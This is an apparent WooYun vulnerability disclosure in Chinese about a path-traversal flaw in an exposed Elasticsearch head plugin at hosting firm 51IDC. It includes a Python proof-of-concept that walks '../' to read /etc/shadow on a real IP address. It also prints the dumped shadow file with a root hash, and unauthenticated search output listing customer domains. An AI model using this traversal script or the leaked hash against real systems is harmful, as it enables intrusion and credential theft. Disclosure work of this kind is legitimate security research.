

缺陷编号:wooyun-2015-0112618

漏洞标题:51IDC某处配置不当一枚造成任意文件读取

相关厂商:51IDC(安畅网络)

漏洞作者: izy

提交时间:2015-05-07 14:46

修复时间:2015-06-25 10:38

公开时间:2015-06-25 10:38

漏洞类型:重要敏感信息泄露

危害等级:高

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:



漏洞详情

披露状态:

2015-05-07: 细节已通知厂商并且等待厂商处理中
2015-05-11: 厂商已经确认,细节仅向厂商公开
2015-05-21: 细节向核心白帽子及相关领域专家公开
2015-05-31: 细节向普通白帽子公开
2015-06-10: 细节向实习白帽子公开
2015-06-25: 细节向公众公开

简要描述:

任意文件读取

详细说明:

IP 来源:http://wooyun.org/bugs/wooyun-2010-0108219
直接读取了 shadow 文件
root:$6$7gdIDbHJ$M3ozjM1jcGyxjwS7mKakC79OHIys7TchDKZ0KYOwYqruDBQsp2D3og/pam8rQecwxNGIUy8vZsCUtpspLLi3L1:16506:0:99999:7:::
bin:*:15513:0:99999:7:::
daemon:*:15513:0:99999:7:::
adm:*:15513:0:99999:7:::
lp:*:15513:0:99999:7:::
sync:*:15513:0:99999:7:::
shutdown:*:15513:0:99999:7:::
halt:*:15513:0:99999:7:::
mail:*:15513:0:99999:7:::
uucp:*:15513:0:99999:7:::
operator:*:15513:0:99999:7:::
games:*:15513:0:99999:7:::
gopher:*:15513:0:99999:7:::
ftp:*:15513:0:99999:7:::
nobody:*:15513:0:99999:7:::
dbus:!!:16506::::::
vcsa:!!:16506::::::
abrt:!!:16506::::::
haldaemon:!!:16506::::::
ntp:!!:16506::::::
saslauth:!!:16506::::::
postfix:!!:16506::::::
sshd:!!:16506::::::
tcpdump:!!:16506::::::
apache:!!:16506::::::
mysql:!!:16506::::::
izy@Macintosh:~$ curl http://58.215.139.37:9200/_search?pretty
{
"took" : 17,
"timed_out" : false,
"_shards" : {
"total" : 62,
"successful" : 62,
"failed" : 0
},
"hits" : {
"total" : 12634697,
"max_score" : 1.0,
"hits" : [ {
"_index" : "logstash-2015.03.11",
"_type" : "datalog",
"_id" : "TNBplZdJTku7WjZkIfjyAg",
"_score" : 1.0,
"_source":{"@version":"1","@timestamp":"2015-03-10T16:00:01.809Z","host":"127.0.0.1:49082","type":"datalog","status":1,"node_label":"网内节点","domain":"financecity.org","time_add":"2015-03-11 00:00:01","user_id":10001,"category":"dns","sub_id":65,"data":"58.215.186.121","node_name":"NODE_LOCAL","token":"dns","time_add_unix":1426003201,"qvalue":"","dns_id":65,"dlabel":"金程国际financecity.org","glabel":"金程国际","group_id":54,"qtype":"A","domain_id":65,"time_total":9.943}
}, {
"_index" : "logstash-2015.03.11",
"_type" : "datalog",
"_id" : "AOkUKSZ1TPmdh77v4RAGiw",
"_score" : 1.0,
"_source":{"@version":"1","@timestamp":"2015-03-10T16:00:01.819Z","host":"127.0.0.1:49087","type":"datalog","status":1,"node_label":"网内节点","domain":"gfedu.net","time_add":"2015-03-11 00:00:01","user_id":10001,"category":"dns","sub_id":66,"data":"58.215.186.122","node_name":"NODE_LOCAL","token":"dns","time_add_unix":1426003201,"qvalue":"","dns_id":66,"dlabel":"金程国际gfedu.net","glabel":"金程国际","group_id":54,"qtype":"A","domain_id":66,"time_total":11.96}
}, {
"_index" : "logstash-2015.03.11",
"_type" : "datalog",
"_id" : "7GE713ACSTi9Xgtv6pY3Nw",
"_score" : 1.0,
"_source":{"@version":"1","@timestamp":"2015-03-10T16:00:01.844Z","host":"127.0.0.1:49090","type":"datalog","status":1,"node_label":"网内节点","domain":"gpst.cn","time_add":"2015-03-11 00:00:01","user_id":10001,"category":"ping","sub_id":37,"time_add_unix":1426003201,"node_name":"NODE_LOCAL","token":"ping","time_total":4.935,"ping_id":37,"dlabel":"上海华东人才gpst.cn","glabel":"上海华东人才","group_id":30,"domain_id":37,"errmsg":""}
}, {
"_index" : "logstash-2015.03.11",
"_type" : "datalog",
"_id" : "KoEfvHN7QyWqXh8l9RFhpw",
"_score" : 1.0,
"_source":{"@version":"1","@timestamp":"2015-03-10T16:00:01.862Z","host":"127.0.0.1:49091","type":"datalog","status":1,"node_label":"网内节点","domain":"www.lillyoncology.com.cn","time_add":"2015-03-11 00:00:01","user_id":10001,"category":"ping","sub_id":32,"time_add_unix":1426003201,"node_name":"NODE_LOCAL","token":"ping","time_total":6.177,"ping_id":32,"dlabel":"礼来国际www.lillyoncology.com.cn","glabel":"礼来国际","group_id":23,"domain_id":32,"errmsg":""}
}, {
"_index" : "logstash-2015.03.11",
"_type" : "datalog",
"_id" : "fXEd4gQWQP2ymF8fMg7LFg",
"_score" : 1.0,
"_source":{"@version":"1","@timestamp":"2015-03-10T16:00:01.867Z","host":"127.0.0.1:49092","type":"datalog","status":1,"node_label":"网内节点","domain":"www.sunflowerclub.com.cn","time_add":"2015-03-11 00:00:01","user_id":10001,"category":"ping","sub_id":33,"time_add_unix":1426003201,"node_name":"NODE_LOCAL","token":"ping","time_total":6.87,"ping_id":33,"dlabel":"礼来国际www.sunflowerclub.com.cn","glabel":"礼来国际","group_id":23,"domain_id":33,"errmsg":""}
}, {
"_index" : "logstash-2015.03.11",
"_type" : "datalog",
"_id" : "pI668m_vS6CvonzA18AFBg",
"_score" : 1.0,
"_source":{"@version":"1","@timestamp":"2015-03-10T16:00:01.867Z","host":"127.0.0.1:49094","type":"datalog","status":1,"node_label":"网内节点","domain":"www.huadong.cn","time_add":"2015-03-11 00:00:01","user_id":10001,"category":"ping","sub_id":38,"time_add_unix":1426003201,"node_name":"NODE_LOCAL","token":"ping","time_total":7.537,"ping_id":38,"dlabel":"上海华东人才www.huadong.cn","glabel":"上海华东人才","group_id":30,"domain_id":38,"errmsg":""}
}, {
"_index" : "logstash-2015.03.11",
"_type" : "datalog",
"_id" : "-GgISu37T5qn6G7bnEe4CA",
"_score" : 1.0,
"_source":{"@version":"1","@timestamp":"2015-03-10T16:00:01.868Z","host":"127.0.0.1:49096","type":"datalog","status":1,"node_label":"网内节点","domain":"www.niwodai.com","time_add":"2015-03-11 00:00:01","user_id":10001,"category":"dns","sub_id":4,"data":"61.160.209.154","node_name":"NODE_LOCAL","token":"dns","time_add_unix":1426003201,"qvalue":"","dns_id":4,"dlabel":"上海嘉银www.niwodai.com","glabel":"默认","group_id":1,"qtype":"A","domain_id":4,"time_total":13.463}
}, {
"_index" : "logstash-2015.03.11",
"_type" : "datalog",
"_id" : "_2OC78h4R5ONSZPZcwJ6aQ",
"_score" : 1.0,
"_source":{"@version":"1","@timestamp":"2015-03-10T16:00:01.868Z","host":"127.0.0.1:49095","type":"datalog","status":1,"node_label":"网内节点","domain":"www.louisfenysh.com","time_add":"2015-03-11 00:00:01","user_id":10001,"category":"dns","sub_id":77,"data":"114.80.110.203","node_name":"NODE_LOCAL","token":"dns","time_add_unix":1426003201,"qvalue":"","dns_id":77,"dlabel":"上海欧晴www.louisfenysh.com","glabel":"上海欧睛","group_id":60,"qtype":"A","domain_id":77,"time_total":10.156}
}, {
"_index" : "logstash-2015.03.11",
"_type" : "datalog",
"_id" : "L4yFkCY9QNG6hr-q-za1nQ",
"_score" : 1.0,
"_source":{"@version":"1","@timestamp":"2015-03-10T16:00:01.868Z","host":"127.0.0.1:49097","type":"datalog","status":1,"node_label":"网内节点","domain":"www.huadong.net.cn","time_add":"2015-03-11 00:00:01","user_id":10001,"category":"ping","sub_id":39,"time_add_unix":1426003201,"node_name":"NODE_LOCAL","token":"ping","time_total":8.239,"ping_id":39,"dlabel":"上海华东人才www.huadong.net.cn","glabel":"上海华东人才","group_id":30,"domain_id":39,"errmsg":""}
}, {
"_index" : "logstash-2015.03.11",
"_type" : "datalog",
"_id" : "bnYfZxh1Sv6XaRR9o7kvsw",
"_score" : 1.0,
"_source":{"@version":"1","@timestamp":"2015-03-10T16:00:01.872Z","host":"127.0.0.1:49109","type":"datalog","status":1,"node_label":"网内节点","domain":"0019.com","time_add":"2015-03-11 00:00:01","user_id":10001,"category":"ping","sub_id":98,"time_add_unix":1426003201,"node_name":"NODE_LOCAL","token":"ping","time_total":7.146,"ping_id":98,"dlabel":"相亲相爱02","glabel":"济南相亲相爱","group_id":16,"domain_id":110,"errmsg":""}
} ]
}
}

漏洞证明:

#coding:utf8
# Proof of concept for the report above. The target's Elasticsearch instance
# (port 9200, see the _search output earlier in the report) exposes the "head"
# site plugin under /_plugin/head/, whose static-file handler serves whatever
# relative path it is given. Prepending repeated "../" segments walks out of
# the plugin directory, so the request ends up returning /etc/shadow -- the
# shadow dump shown in 详细说明 is the output of this script.
# Python 2 script (print statement).
import urllib,requests,re   # urllib and re are imported but never used below
url_raw="http://58.215.139.37:9200/_plugin/head/"   # host from the report; plugin static-file root
payload='../'   # one traversal step; repeated i times in the loop
header={"Accept-Language": "zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3",
"Content-Type": "application/x-www-form-urlencoded",
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:32.0) Gecko/20100101 Firefox/32.0",
"Referer": "http://wooyun.org/bugs/wooyun-2015-111",
# NOTE(review): these cookie values look like the author's own wooyun.org
# session (wy_uid, wy_pwd, PHPSESSID); the header is sent verbatim to the
# target host on every request, i.e. the PoC leaks them to the tested server.
"Cookie":"bdshare_firstime=1111; __cfduid=111; wy_uid=11%1111; wy_pwd=1111%2Bf2ibeQzUQb7y6mP%111; PHPSESSID=93fn61ajmu7opgbpvo06l4i0m0; Hm_lvt_c12f88b5c1cd041a732dea597a5ec94c=1427300078,1427300113,1427332423,1427693626; Hm_lpvt_c12f88b5c1cd041a732dea597a5ec94c=1427694217",
"Connection": "keep-alive",}
_file='etc/shadow'   # path relative to "/" once the traversal has climbed out of the plugin directory
# Blind depth search: try 0..19 "../" segments and print every URL and response
# body; the reader has to pick out the response that actually contains the file.
# There is no exception handling, so a single timeout (3 s) aborts the whole loop.
# Defender's remediation, per the 修复方案 below ("打补丁"): upgrade Elasticsearch
# to a release whose site-plugin file serving rejects traversal, and do not expose
# port 9200 -- the unauthenticated _search shown above -- to untrusted networks.
for i in range(20):
    url=url_raw+payload*i+_file
    r=requests.get(url,headers=header,timeout=3)
    print url.strip()
    print r.text

修复方案:

打补丁。

版权声明:转载请注明来源 izy@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-05-11 10:37

厂商回复:

感谢关注!已处理。

最新状态:

暂无